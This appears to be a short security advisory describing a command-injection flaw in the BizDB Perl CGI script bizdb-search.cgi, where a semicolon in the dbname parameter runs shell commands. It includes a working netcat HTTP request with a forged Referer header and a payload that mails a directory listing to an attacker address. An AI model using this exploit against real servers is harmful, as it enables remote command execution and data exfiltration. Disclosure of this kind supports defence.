BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, has an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver. Remote exploit included.
0231145f36e7ae2640f0dc97b6b4306c0261fc240d851610ac7e3925a5697f20
<html>
<body bgcolor="#000000" text="#CCCCCC">
<pre>BizDB is a web databse integration product
using perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.
The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.
Exploit:
netcat target 80
GET
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@attacker-host|&f6=^a.*&action=searchdbdisplay
HTTP/1.0
Host: target
Referer: http://target/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)
</pre>
</html>